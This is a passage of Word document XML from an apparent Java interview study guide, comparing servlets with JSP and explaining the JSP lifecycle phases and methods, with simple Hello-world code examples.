          </w:tcPr>
          <w:p w14:paraId="1FBA9B8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 Java (scriptlets)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001B573F" w:rsidRPr="001B573F" w14:paraId="47FDF7F4" w14:textId="77777777" w:rsidTr="00176D44">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0C40DADD"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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F190C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ompiled to .class)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6EEE534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translated to .java, then compiled)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001B573F" w:rsidRPr="001B573F" w14:paraId="56DE7739" w14:textId="77777777" w:rsidTr="00176D44">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="751E1CC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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1F43405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rectly compiled as a servlet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7208CE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irst converted to a servlet, then compiled</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001B573F" w:rsidRPr="001B573F" w14:paraId="47C500A2" w14:textId="77777777" w:rsidTr="00176D44">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F90A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est Used For</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5AAD0AE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rocessing logic, interacting with DB, managing sessions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3B8711D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laying data, form output, UI templates</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001B573F" w:rsidRPr="001B573F" w14:paraId="224388DE" w14:textId="77777777" w:rsidTr="00176D44">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6BB62D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adability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="46F3E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ess readable for front-end</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="153B62A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ore readable for designers (looks like HTML)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001B573F" w:rsidRPr="001B573F" w14:paraId="688D7BD1" w14:textId="77777777" w:rsidTr="00176D44">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="13E65FFA"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ification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="07FCBD8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ires recompilation after changes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0600D23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n just modify the JSP file without recompiling servlet</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001B573F" w:rsidRPr="001B573F" w14:paraId="2D609630" w14:textId="77777777" w:rsidTr="00176D44">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="16D3FA1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ifecycle Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5D2DECD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ull lifecycle management with init, service, destroy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="45E2EB1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ollows servlet lifecycle indirectly</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6D6E6CF4"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BCB95">
          <v:rect id="_x0000_i1932" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4056AB5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imple Analogy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F865F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brain</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logic + data),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6BF55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face</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UI + presentation).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BAFF12F"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DE626">
          <v:rect id="_x0000_i1933" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C4652D"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546A45A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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BFF6E3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Servlet extends HttpServlet {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613302B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rotected void doGet(HttpServletRequest req, HttpServletResponse res) throws IOException {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFB70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getWriter().println("Hello from Servlet!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5504D48B"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55AADD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2CBE6A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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135D3EF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7B451B2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2530E6A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from JSP!&lt;/h1&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600CF22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BB1999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175DA872"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32388">
          <v:rect id="_x0000_i1934" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F13E39E"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Modern Usage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39102C2B"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s</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are often used </w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>under the hood</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in frameworks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7B4C8E"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now less commonly used, replaced by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etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6134C2BE" w14:textId="77777777" w:rsidR="00176D44" w:rsidRPr="00CE4B95"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35" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D81D34" w14:textId="47ACE69A" w:rsidR="00502122" w:rsidRPr="00CE4B95" w:rsidRDefault="009E74CB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="407" w:name="_Toc197867621"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the JSP lifecycle</w:t>
      </w:r>
      <w:r w:rsidR="00502122" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="407"/>
    </w:p>
    <w:p w14:paraId="79372CCD" w14:textId="0D65F950" w:rsidR="000631FC" w:rsidRPr="001B573F" w:rsidRDefault="000631FC" w:rsidP="001B573F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>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Explained</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54BEBBC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A </w:t>
      </w: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page is actually </w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>converted into a Servlet</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> by the container (like Tomcat), and it follows a lifecycle similar to servlets — but with a few unique phases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34373662"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32A7C">
          <v:rect id="_x0000_i1936" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="452E2D0F"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234"/>
      </w:tblGrid>
      <w:tr w:rsidR="001B573F" w:rsidRPr="001B573F" w14:paraId="0462C805" w14:textId="77777777" w:rsidTr="000631FC">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="17838207"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hase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B1FF7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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001B573F" w:rsidRPr="001B573F" w14:paraId="0629FDDE" w14:textId="77777777" w:rsidTr="000631FC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5CA011A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1️</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Translation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="03D10E9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is translated into a Java servlet (.java file)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001B573F" w:rsidRPr="001B573F" w14:paraId="4E129682" w14:textId="77777777" w:rsidTr="000631FC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="13FCF1E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2️</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Compilation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="69D93D5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java servlet file is compiled into a .class</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001B573F" w:rsidRPr="001B573F" w14:paraId="11066AAD" w14:textId="77777777" w:rsidTr="000631FC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3A24CE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3️</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Loading</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="31186C7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piled servlet class is loaded into memory</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001B573F" w:rsidRPr="001B573F" w14:paraId="53706C43" w14:textId="77777777" w:rsidTr="000631FC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E3726F8"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4️</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stantiation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="64DED3C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let object (from JSP) is created</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001B573F" w:rsidRPr="001B573F" w14:paraId="63C9E40B" w14:textId="77777777" w:rsidTr="000631FC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1AF62BC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5️</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itialization (jspInit())</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="70FAE256"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after instantiation (like init() in servlets)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001B573F" w:rsidRPr="001B573F" w14:paraId="76080A16" w14:textId="77777777" w:rsidTr="000631FC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="533E5BE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6️</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quest Handling (_jspService())</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1A597C7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for each client request — handles dynamic content</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001B573F" w:rsidRPr="001B573F" w14:paraId="1038F405" w14:textId="77777777" w:rsidTr="000631FC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2D77E4A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7️</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struction (jspDestroy())</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6B8CB64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when JSP is removed/unloaded</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="73F628F9"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1A859">
          <v:rect id="_x0000_i1937" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="458ECB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Internally...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="121DD41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Behind the scenes, your .jsp file becomes something like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D5EF7A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final class example_jsp extends HttpJspBase {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4FDEC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_jspService(HttpServletRequest request, HttpServletResponse response) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1622E7C4"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HTML + Java logic here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542211C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A102B39" w14:textId="77777777" w:rsidR="000631FC" w:rsidRPr="001B573F" w:rsidRDefault="000631FC" w:rsidP="001B573F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19570B3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Init() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B55165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Initialization code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A46E2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1C71A205" w14:textId="77777777" w:rsidR="000631FC" w:rsidRPr="001B573F" w:rsidRDefault="000631FC" w:rsidP="001B573F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E6157A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Destroy() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076BB61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Cleanup code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A34B0A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626A920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2D71AEDA"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414E2">
          <v:rect id="_x0000_i1938" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4DA88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3568"/>
        <w:gridCol w:w="3137"/>
      </w:tblGrid>
      <w:tr w:rsidR="001B573F" w:rsidRPr="001B573F" w14:paraId="79C13DF1" w14:textId="77777777" w:rsidTr="000631FC">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="274719E3"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Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6DB8E105"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alled When</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="689D6890"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urpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001B573F" w:rsidRPr="001B573F" w14:paraId="521F87B2" w14:textId="77777777" w:rsidTr="000631FC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="05723A6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Init()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A36E14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during initialization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="766D173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cate resources (e.g., DB setup)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001B573F" w:rsidRPr="001B573F" w14:paraId="7200E66F" w14:textId="77777777" w:rsidTr="000631FC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1EA589D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_jspService()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4FA6A0B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very time a request is made to the JSP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4670D75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nerates dynamic content</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001B573F" w:rsidRPr="001B573F" w14:paraId="64F36FB8" w14:textId="77777777" w:rsidTr="000631FC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2795306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Destroy()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="216DBD0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before JSP is unloaded</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="09FA5DF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eanup, free resources</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6A11DF60"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91DE92">
          <v:rect id="_x0000_i1939" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB3578A" w14:textId="20CD773A"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t>
      </w:r>
      <w:r w:rsidR="00C81EF1" w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Note</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D323806"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You </w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>don’t override _jspService()</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> directly — the JSP engine does it for you.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9C37C9"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override jspInit() and jspDestroy() for setup/cleanup logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061512A8" w14:textId="77777777" w:rsidR="000631FC" w:rsidRPr="00CE4B95"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40" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="79046887" w14:textId="3F24E96A" w:rsidR="00502122" w:rsidRPr="00CE4B95" w:rsidRDefault="00516033">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="408" w:name="_Toc197867622"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is Spring MVC? Explain architecture of spring MVC</w:t>
      </w:r>
      <w:r w:rsidR="00502122" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="408"/>
    </w:p>
